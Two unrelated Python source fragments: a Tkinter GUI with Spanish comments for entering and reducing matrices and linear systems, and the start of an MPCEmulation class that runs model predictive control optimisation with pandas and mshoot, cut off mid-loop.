self.NFilas.set('2') #Iniciar la interfaz grafica con dos filas
self.NColumnas.set('2')# y dos columnas
if self.VarMatriz.get()==1:
self.FrameMatriz.place(x=20,y=90)
self.Texto1.config(text='Filas:')
self.Texto1.place(x=70,y=15)
self.Texto2.config(text='Columnas:')
self.Texto2.place(x=190,y=15)
self.FrameVariables.place(x=1000,y=90)
self.MTS.place(x=20,y=230)
self.MER.place(x=20,y=254)
self.SGJ.place(x=1000,y=254)
self.MxN()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
else:
self.MTS.place(x=1000,y=230)
self.MER.place(x=1000,y=254)
self.SGJ.place(x=20,y=254)
#Frame(self.Window,bg='#d4dce3',width=360,height=49).place(x=20,y=230)
self.FrameVariables.place(x=20,y=90)
self.FrameMatriz.place(x=20,y=115)
self.NFilas.set('2')
self.NColumnas.set('2')
self.Texto1.config(text='Ecuaciones:')
self.Texto1.place(x=20,y=15)
self.Texto2.config(text='Variables:')
self.Texto2.place(x=190,y=15)
self.Sistema()
self.IniciarCeros()
def TopMostrar(self):
#Dimensiones y propiedades de la Ventana emergente para la vizualizacion de la resolucion de matrices
self.Top=Toplevel()
self.Top.title("Resultados")
self.Top.geometry('500x400+520+100')
self.Top.resizable(0,0)
self.Top.focus_set()
self.canvas=Canvas(self.Top)#Canvas para desplazarse en las 4 direcciones a travez de la ventana emergente
self.canvas.pack()
self.BloqueMostrar=Frame(self.canvas)
self.BloqueMostrar.bind("<Configure>",self.Scroll)#evento para el uso del scroll a travez de la ventana emergente
self.BloqueMostrar.pack()
myscrollbar=Scrollbar(self.Top,orient="vertical",command=self.canvas.yview)#scroll vertical
self.canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.place(x=480,y=0,heigh=380)
myscrollbar=Scrollbar(self.Top,orient="horizontal",command=self.canvas.xview)#scroll horizontal
self.canvas.configure(xscrollcommand=myscrollbar.set)
myscrollbar.place(x=0,y=380,width=480)
self.canvas.create_window((0,0),window=self.BloqueMostrar,anchor='nw')
Label(self.BloqueMostrar,text=' ',width=20).pack()
Label(self.BloqueMostrar,text='Matriz inicial',font=(10)).pack()
def Sistema(self):
self.MxN()
for n in range(0,int(self.NColumnas.get())):
Label(self.FrameVariables,text='X{}'.format(n+1),font=(10),bg='#d4dce3',width=5).grid(row=0,column=n+1)
if self.NFilas.get()=='2' and self.NColumnas.get()=='2':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
self.C14(),self.C24(),self.L03(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='2' and self.NColumnas.get()=='3':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
self.C15(),self.C25(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='2' and self.NColumnas.get()=='4':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
self.C16(),self.C26(),self.L36(),self.L46(),self.L05()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='2' and self.NColumnas.get()=='5':
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
self.C17(),self.C27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='2':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
self.C14(),self.C24(),self.C34(),self.L03(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='3':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
self.C15(),self.C25(),self.C35(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='4':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
self.C16(),self.C26(),self.C36(),self.L46(),self.L05()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='5':
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
self.C17(),self.C27(),self.C37(),self.L47(),self.L57()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='2':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
self.C14(),self.C24(),self.C34(),self.C44(),self.L03(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='3':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
self.C15(),self.C25(),self.C35(),self.C45(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='4':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
self.C16(),self.C26(),self.C36(),self.C46(),self.L56(),self.L05()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='5':
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
self.C17(),self.C27(),self.C37(),self.C47(),self.L57()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='2':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
self.C14(),self.C24(),self.C34(),self.C44(),self.C54(),self.L03(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='3':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
self.C15(),self.C25(),self.C35(),self.C45(),self.C55(),self.L04(),self.L05()
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='4':
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
self.C16(),self.C26(),self.C36(),self.C46(),self.C56(),self.L05()
self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='5':
self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
for i in range(0,int(self.NFilas.get())):
Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
self.C17(),self.C27(),self.C37(),self.C47(),self.C57()
def MoS(self): #Metodo ejecutar el metodo de reduccion matrices o sistema de ecuaciones
self.IniciarCeros()
if self.VarMatriz.get()==1:
self.MxN()
else:
self.Sistema()
def MostrarMatriz(self,matriz,m,n,tipo): #Muestra todos los pasos de la resolucion de matrices en la ventana emergente
Bloque=Frame(self.BloqueMostrar)
Bloque.pack()
Frame(Bloque,bg='black',height=2).grid(row=0,column=1,sticky='we')
Frame(Bloque,bg='black',height=2,width=10).grid(row=n+1,column=1,sticky='we')
Frame(Bloque,bg='black',height=2).grid(row=0,column=0,sticky='we')
Frame(Bloque,bg='black',height=2).grid(row=n+1,column=0,sticky='we')
for i in range(0,n):
Frame(Bloque,bg='black',width=2).grid(row=i+1,column=0,sticky='ns')
for j in range(0,m):
if tipo!='G':
for e in str(matriz[i,j]):
if e=='e' or e=='.':
matriz[i,j]=0
if tipo=='G' and int(j)<m-1:
for e in str(matriz[i,j]):
if e=='e' or e=='.':
matriz[i,j]=0
Label(Bloque,text=str(matriz[i,j]),font=(18)).grid(row=i+1,column=j+2,padx=10)
else:
Label(Bloque,text=str(matriz[i,j]),font=(18)).grid(row=i+1,column=j+3,padx=10)
if tipo=='G':
Frame(Bloque,bg='black',width=2).grid(row=i+1,column=m+1,sticky='ns')
Frame(Bloque,bg='black',width=2).grid(row=i+1,column=m+5,sticky='ns')
Frame(Bloque,bg='black',height=2,width=10).grid(row=0,column=m+4,sticky='we')
Frame(Bloque,bg='black',height=2).grid(row=n+1,column=m+4,sticky='we')
Frame(Bloque,bg='black',height=2).grid(row=0,column=m+5,sticky='we')
Frame(Bloque,bg='black',height=2).grid(row=n+1,column=m+5,sticky='we')
Label(self.BloqueMostrar,text=' ',width=20).pack()
def Scroll(self,event):
self.canvas.configure(scrollregion=self.canvas.bbox("all"),width=450,height=350)
#Creacion de cuadros para la matriz inicial
def C11(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A11,width=5,justify='right',font=(16)).grid(row=1,column=1)
def C12(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A12,width=5,justify='right',font=(16)).grid(row=1,column=2)
def C13(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A13,width=5,justify='right',font=(16)).grid(row=1,column=3)
def C14(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A14,width=5,justify='right',font=(16)).grid(row=1,column=4)
def C15(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A15,width=5,justify='right',font=(16)).grid(row=1,column=5)
def C16(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A16,width=5,justify='right',font=(16)).grid(row=1,column=6)
def C17(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A17,width=5,justify='right',font=(16)).grid(row=1,column=7)
def C21(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A21,width=5,justify='right',font=(16)).grid(row=2,column=1)
def C22(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A22,width=5,justify='right',font=(16)).grid(row=2,column=2)
def C23(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A23,width=5,justify='right',font=(16)).grid(row=2,column=3)
def C24(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A24,width=5,justify='right',font=(16)).grid(row=2,column=4)
def C25(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A25,width=5,justify='right',font=(16)).grid(row=2,column=5)
def C26(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A26,width=5,justify='right',font=(16)).grid(row=2,column=6)
def C27(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A27,width=5,justify='right',font=(16)).grid(row=2,column=7)
def C31(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A31,width=5,justify='right',font=(16)).grid(row=3,column=1)
def C32(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A32,width=5,justify='right',font=(16)).grid(row=3,column=2)
def C33(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A33,width=5,justify='right',font=(16)).grid(row=3,column=3)
def C34(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A34,width=5,justify='right',font=(16)).grid(row=3,column=4)
def C35(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A35,width=5,justify='right',font=(16)).grid(row=3,column=5)
def C36(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A36,width=5,justify='right',font=(16)).grid(row=3,column=6)
def C37(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A37,width=5,justify='right',font=(16)).grid(row=3,column=7)
def C41(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A41,width=5,justify='right',font=(16)).grid(row=4,column=1)
def C42(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A42,width=5,justify='right',font=(16)).grid(row=4,column=2)
def C43(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A43,width=5,justify='right',font=(16)).grid(row=4,column=3)
def C44(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A44,width=5,justify='right',font=(16)).grid(row=4,column=4)
def C45(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A45,width=5,justify='right',font=(16)).grid(row=4,column=5)
def C46(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A46,width=5,justify='right',font=(16)).grid(row=4,column=6)
def C47(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A47,width=5,justify='right',font=(16)).grid(row=4,column=7)
def C51(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A51,width=5,justify='right',font=(16)).grid(row=5,column=1)
def C52(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A52,width=5,justify='right',font=(16)).grid(row=5,column=2)
def C53(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A53,width=5,justify='right',font=(16)).grid(row=5,column=3)
def C54(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A54,width=5,justify='right',font=(16)).grid(row=5,column=4)
def C55(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A55,width=5,justify='right',font=(16)).grid(row=5,column=5)
def C56(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A56,width=5,justify='right',font=(16)).grid(row=5,column=6)
def C57(self):
ttk.Entry(self.FrameMatriz,textvariable=self.A57,width=5,justify='right',font=(16)).grid(row=5,column=7)
#Esconder cuadros de la matriz inicial
def L13(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=3,sticky='wesn')
def L14(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=4,sticky='wesn')
def L15(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=5,sticky='wesn')
def L16(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=6,sticky='wesn')
def L17(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=7,sticky='wesn')
def L23(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=3,sticky='wesn')
def L24(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=4,sticky='wesn')
def L25(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=5,sticky='wesn')
def L26(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=6,sticky='wesn')
def L27(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=7,sticky='wesn')
def L31(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=1,sticky='wesn')
def L32(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=2,sticky='wesn')
def L33(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=3,sticky='wesn')
def L34(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=4,sticky='wesn')
def L35(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=5,sticky='wesn')
def L36(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=6,sticky='wesn')
def L37(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=7,sticky='wesn')
def L41(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=1,sticky='wesn')
def L42(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=2,sticky='wesn')
def L43(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=3,sticky='wesn')
def L44(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=4,sticky='wesn')
def L45(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=5,sticky='wesn')
def L46(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=6,sticky='wesn')
def L47(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=7,sticky='wesn')
def L51(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=1,sticky='wesn')
def L52(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=2,sticky='wesn')
def L53(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=3,sticky='wesn')
def L54(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=4,sticky='wesn')
def L55(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=5,sticky='wesn')
def L56(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=6,sticky='wesn')
def L57(self):
Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=7,sticky='wesn')
def L03(self):
Frame(self.FrameVariables,bg='#d4dce3').grid(row=0,column=3,sticky='wesn')
def L04(self):
Frame(self.FrameVariables,bg='#d4dce3').grid(row=0,column=4,sticky='wesn')
def L05(self):
Frame(self.FrameVariables,bg='#d4dce3').grid(row=0,column=5,sticky='wesn')
def MxN(self): #Llamar a los metodos creadores o desaparecedores de cuadros segun establezca el usuario
if self.NFilas.get()=='2' and self.NColumnas.get()=='2':
self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='2' and self.NColumnas.get()=='3':
self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='2' and self.NColumnas.get()=='4':
self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='2' and self.NColumnas.get()=='5':
self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='2':
self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
self.C31(),self.C32(),self.L33(),self.L34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='3':
self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
self.C31(),self.C32(),self.C33(),self.L34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='4':
self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
self.C31(),self.C32(),self.C33(),self.C34(),self.L35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='3' and self.NColumnas.get()=='5':
self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
self.C31(),self.C32(),self.C33(),self.C34(),self.C35()
self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='2':
self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
self.C31(),self.C32(),self.L33(),self.L34(),self.L35()
self.C41(),self.C42(),self.L43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='3':
self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
self.C31(),self.C32(),self.C33(),self.L34(),self.L35()
self.C41(),self.C42(),self.C43(),self.L44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='4':
self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
self.C31(),self.C32(),self.C33(),self.C34(),self.L35()
self.C41(),self.C42(),self.C43(),self.C44(),self.L45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='4' and self.NColumnas.get()=='5':
self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
self.C31(),self.C32(),self.C33(),self.C34(),self.C35()
self.C41(),self.C42(),self.C43(),self.C44(),self.C45()
self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='2':
self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
self.C31(),self.C32(),self.L33(),self.L34(),self.L35()
self.C41(),self.C42(),self.L43(),self.L44(),self.L45()
self.C51(),self.C52(),self.L53(),self.L54(),self.L55()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='3':
self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
self.C31(),self.C32(),self.C33(),self.L34(),self.L35()
self.C41(),self.C42(),self.C43(),self.L44(),self.L45()
self.C51(),self.C52(),self.C53(),self.L54(),self.L55()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='4':
self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
self.C31(),self.C32(),self.C33(),self.C34(),self.L35()
self.C41(),self.C42(),self.C43(),self.C44(),self.L45()
self.C51(),self.C52(),self.C53(),self.C54(),self.L55()
elif self.NFilas.get()=='5' and self.NColumnas.get()=='5':
self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
self.C31(),self.C32(),self.C33(),self.C34(),self.C35()
self.C41(),self.C42(),self.C43(),self.C44(),self.C45()
self.C51(),self.C52(),self.C53(),self.C54(),self.C55()
def IniciarCeros(self): #LLenar de ceros todos los cuadroz de la matriz
self.A11.set('0'),self.A12.set('0'),self.A13.set('0'),self.A14.set('0'),self.A15.set('0'),self.A16.set('0'),self.A17.set('0')
self.A21.set('0'),self.A22.set('0'),self.A23.set('0'),self.A24.set('0'),self.A25.set('0'),self.A26.set('0'),self.A27.set('0')
self.A31.set('0'),self.A32.set('0'),self.A33.set('0'),self.A34.set('0'),self.A35.set('0'),self.A36.set('0'),self.A37.set('0')
self.A41.set('0'),self.A42.set('0'),self.A43.set('0'),self.A44.set('0'),self.A45.set('0'),self.A46.set('0'),self.A47.set('0')
self.A51.set('0'),self.A52.set('0'),self.A53.set('0'),self.A54.set('0'),self.A55.set('0'),self.A56.set('0'),self.A57.set('0') |
import logging
import abc
import time
import copy
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from mshoot.mshoot import MShoot
class MPCEmulation():
"""
MPC emulation is used to test an MPC strategy in a simulated
environment. Two models are required: (1) control model,
(2) emulation model.
The control model is used in the optimization.
The emulation model is the virtual mock-up of the real system.
The cost function should return a scalar and have
the following signature:
.. code::
def cost(xdf, ydf):
# user code here
return cost
where xdf is the state data frame and ydf is the output
data frame.
:param emumod: SimModel, emulation model
:param cfun: user cost function
"""
def __init__(self, emumod, cfun):
self.log = logging.getLogger('MPCEmulation')
self.log.info('Instantiate MPCEmulation')
# Emulation model
self.emumod = emumod
# User cost function
self.cost_user = cfun
pd.set_option('display.max_columns', 50)
def optimize(self, model, inp_ctr, inp_emu, free, ubounds, xbounds,
x0, ynominal=None, maxiter=50,
step=1, horizon=10, inp_clb=None):
"""
Optimize problem using progressive multiple shooting optimizations.
`inp_ctr` and `inp_emu` have to have the same index (control
and emulation inputs need to be aligned).
If `inp_clb` is provided with a callback function, then it overrides
`inp_ctr`. The function can be used to provide new inputs for each
receding horizon, emulating in example new weather/occupancy forecasts.
The callback function takes only one argument `index`, which is a numpy
1D array with time steps for which the inputs have to be provided,
e.g. if `index = [300, 600, 900, 1200]` is passed to the function,
it should return a data frame with index `[300, 600, 900, 1200]`
and columns for all input variables. Since `inp_ctr` is a required argument,
for clarity it is advised to set it to `None` in cases when `inp_clb` is provided.
See the example `examples/mpc_fmi_6.py` for how to use `inp_clb`.
Return:
- u - DataFrame, optimal free inputs
- xctr - DataFrame, control states
- xemu - DataFrame, emulation states
- yemu - DataFrame, emulation outputs
- uhist - list of DataFrames, optimal free inputs per MPC interval
:param model: SimModel, control model
:param inp_ctr: DataFrame, fixed inputs for control model, index with time
:param inp_emu: DataFrame, fixed inputs for emulation model, index with time
:param free: list, names of free inputs
:param ubounds: list of tuples of floats, free input bounds
:param xbounds: list of tuples of vectors, state bounds
:param x0: list, initial state
:param ynominal: list, nominal values of outputs (for regularization)
:param maxiter: int, maximum number of iterations (default 50)
:param step: int, MPC re-run step - number of `inp` rows (default 1)
:param horizon: int, opt. horizon - number of `inp` rows (default 10)
:param inp_clb: callback function, see description
:return: u, xctr, xemu, yemu, uhist
"""
self.log.info("**Start MPC optimization**")
# Sanity checks
assert len(ubounds) == len(free)
assert len(xbounds) == len(x0)
if ynominal is not None:
pass # No information about model outputs passed to this method
# Make sure x0 is ndarray
x0 = np.array(x0).astype(float)
# Initialize inp_ctr from callback, if provided.
# Initialization based on inp_emu. In each MPC loop
# pass, a portion of the inp_ctr will be
# overwritten by the callback function.
if inp_clb is not None:
inp_ctr = inp_emu.copy()
# Assert index type is int
inp_ctr.index = inp_ctr.index.astype(int)
inp_emu.index = inp_emu.index.astype(int)
# Assert control and emulation input indexes as the same
assert np.isclose(inp_ctr.index.values, inp_emu.index.values).all(), \
"Control and emulation input indexes are not equal!"
# Initialize optimal free inputs u (to be returned)
t = inp_emu.index[0] # Current time
u = pd.DataFrame(
index=inp_emu.index,
columns=free,
data=np.zeros((inp_emu.index.size, len(free)))) # Optimal free inputs
xemu = pd.DataFrame(index=inp_emu.index) # Emulation states
yemu = pd.DataFrame(index=inp_emu.index) # Emulation outputs
xctr = pd.DataFrame(index=inp_emu.index) # Control states
uhist = list() # List of optimal solutions from all intervals
# Extend bounds if given as floats
xbounds = list(xbounds)
for i in range(len(xbounds)):
xb = xbounds[i]
newxb = list()
for b in xb:
if isinstance(b, float) or isinstance(b, int):
newxb.append(np.full(inp_emu.index.size, b))
else:
newxb.append(b)
xbounds[i] = newxb
# Instantiate optimizer
ms = MShoot(self.cost_user)
# Start MPC loops
i = 0
dt = 0
while (i + horizon <= inp_emu.index.size):
self.log.debug("Current MPC time: {} s".format(t))
print("Progress: {:.1f}%".format(float(i) / inp_emu.index.size * 100.)) # TODO: To log
# Calculate MPC re-run time step
dt = inp_emu.index[i+step] - inp_emu.index[i]
# Define inputs for next period
nxt_inp_ctr = inp_ctr.iloc[i:i+horizon+1].copy()
nxt_inp_emu = inp_emu.iloc[i:i+horizon+1].copy()
# Overwrite control inputs using the callback function (if provided)
if inp_clb is not None:
index = inp_ctr.index[i:i+horizon+1]
self.log.debug(
'Using inp_clb for getting new inputs. index = {}'.format(index)
)
nxt_inp_ctr = inp_clb(index=index)
assert np.isclose(nxt_inp_ctr.index.values, index.values).all(), \
'Index of the dataframe returned by' + \
' inp_clb not consistent with emulation input dataframe'
nxt_xbounds = [
(b[0][i:i+horizon+1], b[1][i:i+horizon+1]) for b in xbounds
]
if i == 0:
nxt_x0 = x0
else:
nxt_x0 = xemu.iloc[i].values
uguess = u.loc[nxt_inp_ctr.index].iloc[:-1].values # One element shorter than inp
self.log.debug("nxt_inp_ctr:\n{}".format(nxt_inp_ctr))
self.log.debug("nxt_xbounds:\n{}".format(nxt_xbounds))
self.log.debug("next_x0:\n{}".format(nxt_x0))
self.log.debug("uguess:\n{}".format(uguess))
# Optimize
udf, xdf = ms.optimize(
model=model,
inp=nxt_inp_ctr,
free=free,
ubounds=ubounds,
xbounds=nxt_xbounds,
x0=nxt_x0,
uguess=uguess,
ynominal=ynominal,
join=1, # TODO: add to arguments
maxiter=maxiter
)
# Assert index type is int
udf.index = udf.index.astype(int)
xdf.index = xdf.index.astype(int)
# Add udf to `uhist`
uhist.append(udf.copy())
# Update `u`
u.loc[udf.index] = udf.copy()
# Save control states to `xctr`
if len(xctr.columns) == 0:
# Add columns
for c in xdf.columns:
xctr[c] = np.nan
